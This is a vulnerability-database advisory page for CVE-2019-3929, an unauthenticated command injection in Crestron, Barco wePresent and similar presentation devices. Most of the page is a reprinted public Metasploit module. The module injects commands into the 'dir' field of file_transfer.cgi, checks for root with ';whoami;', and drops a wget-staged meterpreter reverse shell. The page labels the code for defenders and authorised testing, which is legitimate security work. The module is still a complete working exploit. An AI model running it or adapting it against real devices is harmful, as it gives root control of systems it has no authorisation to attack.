CVE-2019-3929
Description
Multiple Crestron products are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
CISA KEV
- Vendor
- Crestron
- Product
- Multiple Products
- Due date
- 2022-05-06
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Barco WePresent - file_transfer.cgi Command Injection (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => "Barco WePresent file_transfer.cgi Command Injection",
'Description' => %q(
This module exploits an unauthenticated remote command injection
vulnerability found in Barco WePresent and related OEM'ed products.
The vulnerability is triggered via an HTTP POST request to the
file_transfer.cgi endpoint.
),
'License' => MSF_LICENSE,
'Author' => 'Jacob Baines', # @Junior_Baines'
'References' =>
[
['CVE', '2019-3929'],
['EDB', '46786'],
['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
],
'DisclosureDate' => "Apr 30, 2019",
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => false,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
}],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'CmdStagerFlavor' => ['printf', 'wget'],
'Type' => :linux_dropper]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'printf',
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
}))
end
def filter_bad_chars(cmd)
cmd.gsub!(/;/, 'Pa_Note')
cmd.gsub!(/\+/, 'Pa_Add')
cmd.gsub!(/&/, 'Pa_Amp')
return cmd
end
def send_command(cmd, timeout)
vars_post = {
file_transfer: 'new',
dir: "'#{filter_bad_chars(cmd)}'"
}
send_request_cgi({
'uri' => '/cgi-bin/file_transfer.cgi',
'method' => 'POST',
'vars_post' => vars_post
}, timeout)
end
def check
check_resp = send_command(";whoami;", 5)
unless check_resp
return CheckCode::Unknown('Connection failed.')
end
if check_resp.code == 200
check_resp.body.gsub!(/[\r\n]/, "")
if check_resp.body == "root"
return CheckCode::Vulnerable
end
end
CheckCode::Safe
end
def execute_command(cmd, _opts = {})
send_command(";(#{cmd})&", nil)
end
def exploit
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager(linemax: 128)
end
end
endCrestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection
Metasploit modules
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.